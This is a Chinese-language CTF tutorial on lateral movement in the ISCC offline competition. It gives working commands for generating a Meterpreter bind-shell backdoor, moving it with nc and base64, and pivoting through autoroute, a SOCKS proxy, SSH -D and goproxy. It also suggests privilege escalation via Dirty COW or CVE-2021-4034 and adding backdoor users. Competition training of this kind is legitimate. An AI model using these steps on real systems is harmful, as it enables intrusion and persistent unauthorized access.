ISCC线下如何配置代理攻击其他私地及高地
字数 904 2025-08-30 06:50:28

ISCC线下赛代理配置与内网攻击技术指南

前言

本文档详细讲解在ISCC线下赛中如何配置代理攻击其他私地及高地的技术方法。针对比赛中常见的"有exp但无法攻击得分"的情况,提供完整的解决方案。

网络环境分析

典型ISCC线下赛网络拓扑包含以下机器:

  • Windows(宿主机): 192.168.10.5
  • kali(代理机/攻击机):
    • 192.168.138.133
    • 192.168.222.130
  • Ubuntu(私地):
    • 192.168.222.132
    • 192.168.234.132
  • Ubuntu(其他私地/高地): 192.168.234.134

网络限制条件

  1. 本机可直接访问私地,但不能直接访问其他私地和高地
  2. 私地服务器不能回连攻击机
  3. 所有私地服务器在同一C段(可先扫描存活主机)
  4. 高地服务器不与私地在同一网段
  5. 自己的两个私地服务器可互相访问

攻击流程详解

1. MSF生成后门

由于私地不能回连攻击机,需生成正向后门:

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=6677 -f elf > msf

2. 后门传输到私地

Web服务器传输方法:

  • 直接上传文件
  • 使用wget/curl下载

Pwn服务器传输方法(只有/bin/sh):

  1. 先建立完整shell终端:
python3 -c 'import pty;pty.spawn("/bin/bash")'
  1. 使用echo写入文件(大文件需分块):
cat msf | base64 > 1.txt  # 将文件base64编码
echo "base64内容" > file  # 写入文件
base64 -d file > msf      # 解码还原文件
  1. 使用nc传输:
# 接收端
nc -l -p 1234 > msf

# 发送端
nc -w 3 [目标IP] 1234 < msf

3. MSF上线与代理配置

  1. 启动handler:
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set LPORT 6677
set RHOST 192.168.222.132  # 私地地址
run
  1. 进程迁移(提高稳定性):
ps
migrate [PID]  # 选择系统进程注入
  1. 添加路由表:
run post/multi/manage/autoroute
run autoroute -p  # 查看路由表
  1. 配置SOCKS代理:
use auxiliary/server/socks_proxy
set session 1
set SRVPORT 1080
set VERSION 5
run
  1. 宿主机使用Proxifier连接kali的1080端口

4. 访问其他网段机器

配置完成后,可通过代理访问其他私地和高地服务器(如192.168.234.0/24网段)

替代方法

SSH端口转发

ssh -D 1080 user@[跳板机IP]

使用goproxy工具

# 上传goproxy到目标机器
./goproxy -S :1080

注意事项

提权建议

  • Ubuntu 16.04可使用脏牛漏洞提权
  • CVE-2021-4034 (pkexec漏洞)也可尝试
  • 提前准备离线提权工具

连接稳定性

  1. 创建后门用户防止session丢失
  2. 部署通防保护自身环境
  3. 多建立几个备用session

其他技巧

  1. 先扫描整个内网存活主机
  2. 保持多个访问途径
  3. 重要操作前备份环境

通过以上方法,可以有效解决ISCC线下赛中"有exp但无法攻击"的问题,实现对其他私地和高地的攻击。

ISCC线下赛代理配置与内网攻击技术指南 前言 本文档详细讲解在ISCC线下赛中如何配置代理攻击其他私地及高地的技术方法。针对比赛中常见的"有exp但无法攻击得分"的情况,提供完整的解决方案。 网络环境分析 典型ISCC线下赛网络拓扑包含以下机器: Windows(宿主机) : 192.168.10.5 kali(代理机/攻击机) : 192.168.138.133 192.168.222.130 Ubuntu(私地) : 192.168.222.132 192.168.234.132 Ubuntu(其他私地/高地) : 192.168.234.134 网络限制条件 : 本机可直接访问私地,但不能直接访问其他私地和高地 私地服务器不能回连攻击机 所有私地服务器在同一C段(可先扫描存活主机) 高地服务器不与私地在同一网段 自己的两个私地服务器可互相访问 攻击流程详解 1. MSF生成后门 由于私地不能回连攻击机,需生成正向后门: 2. 后门传输到私地 Web服务器传输方法: 直接上传文件 使用wget/curl下载 Pwn服务器传输方法(只有/bin/sh): 先建立完整shell终端: 使用echo写入文件(大文件需分块): 使用nc传输: 3. MSF上线与代理配置 启动handler: 进程迁移(提高稳定性): 添加路由表: 配置SOCKS代理: 宿主机使用Proxifier连接kali的1080端口 4. 访问其他网段机器 配置完成后,可通过代理访问其他私地和高地服务器(如192.168.234.0/24网段) 替代方法 SSH端口转发 使用goproxy工具 注意事项 提权建议 Ubuntu 16.04可使用脏牛漏洞提权 CVE-2021-4034 (pkexec漏洞)也可尝试 提前准备离线提权工具 连接稳定性 创建后门用户防止session丢失 部署通防保护自身环境 多建立几个备用session 其他技巧 先扫描整个内网存活主机 保持多个访问途径 重要操作前备份环境 通过以上方法,可以有效解决ISCC线下赛中"有exp但无法攻击"的问题,实现对其他私地和高地的攻击。